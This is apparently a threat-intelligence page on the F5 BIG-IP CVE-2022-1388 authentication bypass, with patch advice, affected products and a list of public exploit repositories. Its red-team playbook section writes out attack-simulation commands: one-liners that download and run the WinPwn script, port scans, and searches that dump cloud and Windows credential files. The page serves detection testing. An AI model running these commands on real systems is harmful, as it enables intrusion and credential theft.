CVE-2022-1388
Overview
This vulnerability is an authentication bypass affecting the iControl REST interface of F5 BIG-IP devices. The root cause lies in improper validation of authentication tokens in the REST management API, allowing unauthorized requests to bypass security checks. The flaw specifically impacts the iControl REST service component across multiple BIG-IP software versions.
Vulnerability Description
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Impact
An attacker can bypass authentication without credentials or user interaction to execute arbitrary commands on the BIG-IP system. This allows full system compromise including remote code execution with administrative privileges, potentially leading to data exfiltration, service disruption, or lateral movement within the network. The vulnerability enables attackers to control critical network infrastructure components, severely impacting business operations.
Solution
F5 Networks recommends upgrading affected BIG-IP versions to fixed releases: 16.1.2.2 or later, 15.1.5.1 or later, 14.1.4.6 or later, and 13.1.5 or later. Versions 12.1.x and 11.6.x have reached End of Technical Support and should be upgraded to supported versions. Detailed patch instructions and advisories are available at https://support.f5.com/csp/article/K23605346. No workarounds are officially recommended; prompt application of vendor patches is essential.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability affecting specific versions of F5 BIG-IP products allows unauthorized requests to bypass iControl REST authentication mechanisms. This flaw arises from improper validation of requests, which can lead to unauthorized access to sensitive functionalities within the affected systems. The iControl REST API is a critical interface for managing and configuring F5 devices, and its compromise can enable attackers to manipulate configurations, access sensitive data, or disrupt services. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to organizations relying on these products for application delivery and security.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage crafted requests to the iControl REST API, bypassing authentication checks entirely. This could be achieved by sending specially formatted requests that the system fails to recognize as unauthorized. Scenarios may include an attacker gaining administrative access to modify firewall rules, alter load balancing configurations, or even disable security features. The potential for exploitation is particularly concerning in environments where these products are integrated into critical infrastructure, as it could lead to widespread service disruptions or data breaches.
The real-world impact of this vulnerability is significant, particularly for organizations that utilize F5 BIG-IP products in their network architecture. The ability to bypass authentication could result in unauthorized access to sensitive data, manipulation of application traffic, and even complete system compromise. This not only poses a direct threat to the confidentiality, integrity, and availability of organizational data but also exposes businesses to regulatory penalties, reputational damage, and financial losses. The risk is amplified in sectors such as finance, healthcare, and critical infrastructure, where the consequences of such breaches can be catastrophic.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is crucial to upgrade to the latest patched versions of the affected F5 BIG-IP products, as this will address the underlying flaw. Additionally, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Monitoring network traffic for unusual patterns or unauthorized access attempts can also help in early detection of exploitation attempts. Employing strong authentication mechanisms, such as multi-factor authentication, can further bolster security and reduce the risk of unauthorized access.
In conclusion, the vulnerability affecting the iControl REST API of F5 BIG-IP products presents a critical threat to organizations that depend on these systems for application delivery and security. The potential for exploitation is high, with severe implications for business operations and data security. By prioritizing timely updates, proactive monitoring, and robust security practices, organizations can mitigate the risks associated with this vulnerability and protect their critical assets from malicious actors. The ongoing vigilance and adaptation of security strategies are essential in the ever-evolving landscape of cybersecurity threats.
CSURFACE threat intelligence has detected a moderate increase in exploitation attempts targeting the CVE-2022-1388 vulnerability in F5 BIG-IP systems. This uptick in activity, reflected by a discernible rise in telemetry signals, indicates sustained adversary interest despite the vulnerability’s age and the availability of patches. Notably, the persistence of multiple publicly available proof-of-concept exploits continues to lower the barrier for threat actors, including ransomware groups such as BackdoorDiplomacy, to weaponize this flaw. Although the EPSS score remains high and stable, the incremental growth in exploitation attempts underscores an ongoing risk that defenders must monitor closely. This evolving threat landscape suggests that organizations running affected BIG-IP versions remain prime targets for unauthorized access and potential ransomware deployment, maintaining the vulnerability’s critical status within the current risk environment.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the CVE-2022-1388 vulnerability on F5 BIG-IP devices. This uptick, while modest, reflects a continuing trend of adversaries leveraging publicly available proof-of-concept exploits to bypass authentication controls. Our telemetry indicates that threat actors, including ransomware-associated groups such as BackdoorDiplomacy, remain actively engaged in reconnaissance and exploitation efforts. Although the EPSS score remains consistently high and stable, the observed increase in activity underscores that the vulnerability continues to be a viable vector for unauthorized access and potential ransomware deployment. This evolving exploitation landscape reinforces the critical risk posture of affected BIG-IP versions and highlights the necessity for ongoing vigilance in monitoring and defense.
Affected Products (66)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Application Acceleration Manager | All |
cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
F5 BIG-IP iControl RCE via REST Authentication Bypass
exploits/linux/http/f5_icontrol_rce
|
Heyder Andrade | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| F5 BIG-IP 16.0.x - Remote Code Execution (RCE) | Yesith Alvarez | remote | multiple | - | View |
GitHub PoCs (65)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2022-1388
POC for CVE-2022-1388
|
horizon3ai | 230 | 37 | 2022-05-09 | View |
|
doocop/CVE-2022-1388-EXP
CVE-2022-1388 F5 BIG-IP RCE 批量检测
|
doocop | 93 | 20 | 2022-05-07 | View |
|
0xf4n9x/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE
|
0xf4n9x | 83 | 29 | 2022-05-09 | View |
|
alt3kx/CVE-2022-1388_PoC
F5 BIG-IP RCE exploitation (CVE-2022-1388)
|
alt3kx | 87 | 17 | 2022-05-09 | View |
|
ZephrFish/F5-CVE-2022-1388-Exploit
Exploit and Check Script for CVE 2022-1388
|
ZephrFish | 59 | 29 | 2022-05-09 | View |
|
sherlocksecurity/CVE-2022-1388-Exploit-POC
PoC for CVE-2022-1388_F5_BIG-IP
|
sherlocksecurity | 57 | 12 | 2022-05-09 | View |
|
numanturle/CVE-2022-1388
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
|
numanturle | 53 | 12 | 2022-05-05 | View |
|
Al1ex/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST RCE
|
Al1ex | 37 | 12 | 2022-05-09 | View |
|
jheeree/CVE-2022-1388-checker
Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5)
|
jheeree | 25 | 13 | 2022-05-05 | View |
|
MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management...
|
MrCl0wnLab | 28 | 9 | 2022-05-06 | View |
|
Zeyad-Azima/CVE-2022-1388
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
|
Zeyad-Azima | 12 | 6 | 2022-05-12 | View |
|
PsychoSec2/CVE-2022-1388-POC
An Improved Proof of Concept for CVE-2022-1388 w/ an Interactive Shell
|
PsychoSec2 | 14 | 4 | 2022-05-15 | View |
|
justakazh/CVE-2022-1388
Tool for CVE-2022-1388
|
justakazh | 13 | 4 | 2022-05-13 | View |
|
west9b/F5-BIG-IP-POC
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
|
west9b | 10 | 2 | 2022-05-28 | View |
|
blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit
|
blind-intruder | 7 | 3 | 2022-05-08 | View |
|
Vulnmachines/F5-Big-IP-CVE-2022-1388
CVE-2022-1388 F5 Big IP unauth remote code execution
|
Vulnmachines | 6 | 4 | 2022-05-09 | View |
|
Henry4E36/CVE-2022-1388
F5 BIG-IP iControl REST身份验证绕过漏洞
|
Henry4E36 | 8 | 1 | 2022-05-09 | View |
|
qusaialhaddad/F5-BigIP-CVE-2022-1388
Reverse Shell for CVE-2022-1388
|
qusaialhaddad | 7 | 1 | 2022-05-10 | View |
|
vaelwolf/CVE-2022-1388
-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red te...
|
vaelwolf | 7 | 1 | 2022-12-24 | View |
|
Stonzyy/Exploit-F5-CVE-2022-1388
PoC For F5 BIG-IP - bash script Exploit one Liner
|
Stonzyy | 5 | 3 | 2022-05-10 | View |
|
Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388
|
Angus-Team | 5 | 3 | 2022-05-10 | View |
|
0x7eTeam/CVE-2022-1388-PocExp
CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation
|
0x7eTeam | 6 | 2 | 2022-05-10 | View |
|
gotr00t0day/CVE-2022-1388
A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated...
|
gotr00t0day | 7 | 0 | 2024-04-30 | View |
|
AmirHoseinTangsiriNET/CVE-2022-1388-Scanner
|
AmirHoseinTangsiriNET | 5 | 2 | 2022-05-11 | View |
|
MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was ass...
|
MrCl0wnLab | 6 | 0 | 2022-05-10 | View |
|
bandit92/CVE2022-1388_TestAPI
A Test API for testing the POC against CVE-2022-1388
|
bandit92 | 4 | 2 | 2022-05-10 | View |
|
nvk0x/CVE-2022-1388-exploit
exploit poc
|
nvk0x | 3 | 1 | 2024-01-03 | View |
|
saucer-man/CVE-2022-1388
CVE-2022-1388
|
saucer-man | 2 | 1 | 2022-05-09 | View |
|
thatonesecguy/CVE-2022-1388-Exploit
Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)
|
thatonesecguy | 1 | 2 | 2022-05-10 | View |
|
Chocapikk/CVE-2022-1388
CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint
|
Chocapikk | 1 | 2 | 2022-06-20 | View |
|
revanmalang/CVE-2022-1388
|
revanmalang | 3 | 0 | 2022-11-30 | View |
|
savior-only/CVE-2022-1388
CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞
|
savior-only | 2 | 0 | 2022-05-09 | View |
|
aancw/CVE-2022-1388-rs
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
|
aancw | 2 | 0 | 2022-05-17 | View |
|
LinJacck/CVE-2022-1388-EXP
CVE-2022-1388-EXP可批量实现攻击
|
LinJacck | 1 | 1 | 2022-05-10 | View |
|
0xAgun/CVE-2022-1388
|
0xAgun | 1 | 1 | 2022-05-10 | View |
|
nico989/CVE-2022-1388
PoC for CVE-2022-1388 affecting F5 BIG-IP.
|
nico989 | 1 | 1 | 2024-01-09 | View |
|
yukar1z0e/CVE-2022-1388
batch scan CVE-2022-1388
|
yukar1z0e | 1 | 1 | 2022-05-09 | View |
|
SecTheBit/CVE-2022-1388
Nuclei Template for CVE-2022-1388
|
SecTheBit | 2 | 0 | 2022-05-12 | View |
|
devengpk/CVE-2022-1388
|
devengpk | 2 | 0 | 2022-12-21 | View |
|
superzerosec/CVE-2022-1388
CVE-2022-1388 POC exploit
|
superzerosec | 2 | 0 | 2022-05-09 | View |
|
vesperp/CVE-2022-1388-F5-BIG-IP
|
vesperp | 1 | 1 | 2022-05-10 | View |
|
EvilLizard666/CVE-2022-1388
CVE-2022-1388 Scanner
|
EvilLizard666 | 2 | 0 | 2022-05-11 | View |
|
pauloink/CVE-2022-1388
Research and proof of concept related to CVE-2022-1388.
|
pauloink | 0 | 2 | 2022-05-11 | View |
|
li8u99/CVE-2022-1388
CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint
|
li8u99 | 0 | 2 | 2022-06-21 | View |
|
chesterblue/CVE-2022-1388
POC of CVE-2022-1388
|
chesterblue | 1 | 0 | 2022-05-10 | View |
|
iveresk/cve-2022-1388-1veresk
Simple shell script for the exploit
|
iveresk | 1 | 0 | 2022-05-10 | View |
|
shamo0/CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
|
shamo0 | 1 | 0 | 2022-05-10 | View |
|
iveresk/cve-2022-1388-iveresk-command-shell
Improved POC for CVE-2022-1388 that affects multiple F5 products.
|
iveresk | 1 | 0 | 2022-05-15 | View |
|
Luchoane/CVE-2022-1388_refresh
PoC for exploiting CVE-2022-1388 on BIG IP F5
|
Luchoane | 1 | 0 | 2022-07-01 | View |
|
ThinkingOffensively/CVE-2022-1388
cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE
|
ThinkingOffensively | 1 | 0 | 2022-10-25 | View |
|
amitlttwo/CVE-2022-1388
|
amitlttwo | 1 | 0 | 2022-12-06 | View |
|
Wrin9/CVE-2022-1388
|
Wrin9 | 0 | 1 | 2022-05-16 | View |
|
j-baines/tippa-my-tongue
F5 BIG-IP Exploit Using CVE-2022-1388 and CVE-2022-41800
|
j-baines | 1 | 0 | 2023-04-12 | View |
|
jbharucha05/CVE-2022-1388
CVE-2022-1388, bypassing iControl REST authentication
|
jbharucha05 | 0 | 1 | 2022-07-04 | View |
|
SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study
F5-BIG-IP Remote Code Execution Vulnerability CVE-2022-1388: A Case Study
|
SudeepaShiranthaka | 0 | 1 | 2023-07-12 | View |
|
Osyanina/westone-CVE-2022-1388-scanner
A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.
|
Osyanina | 0 | 0 | 2022-05-07 | View |
|
r0otk3r/CVE-2022-1388
|
r0otk3r | 0 | 0 | 2025-07-12 | View |
|
sashka3076/F5-BIG-IP-exploit
CVE-2022-1388
|
sashka3076 | 0 | 0 | 2022-06-04 | View |
|
Hudi233/CVE-2022-1388
|
Hudi233 | 0 | 0 | 2022-05-09 | View |
|
mr-vill4in/CVE-2022-1388
CVE-2022-1388
|
mr-vill4in | 0 | 0 | 2022-05-11 | View |
|
omnigodz/CVE-2022-1388
This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE)
|
omnigodz | 0 | 0 | 2022-05-11 | View |
|
battleofthebots/refresh
CVE-2022-1388 - F5 Router RCE Replica
|
battleofthebots | 0 | 0 | 2023-08-01 | View |
|
impost0r/CVE-2022-1388
Old weaponized CVE-2022-1388 exploit.
|
impost0r | 0 | 0 | 2024-09-12 | View |
|
On-Cyber-War/CVE-2022-1388
cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE
|
On-Cyber-War | 0 | 0 | 2022-10-25 | View |
|
M4fiaB0y/CVE-2022-1388
Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)
|
M4fiaB0y | 0 | 0 | 2022-12-09 | View |
Threat Feed
20 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-1388 |
| support.f5.com |
GitHub CVE
|
https://support.f5.com/csp/article/K23605346 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.html |
| secpod.com |
GitHub CVE
|
https://www.secpod.com/blog/critical-f5-big-ip-remote-code-execution-vulnerability-patch-now/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-1388 |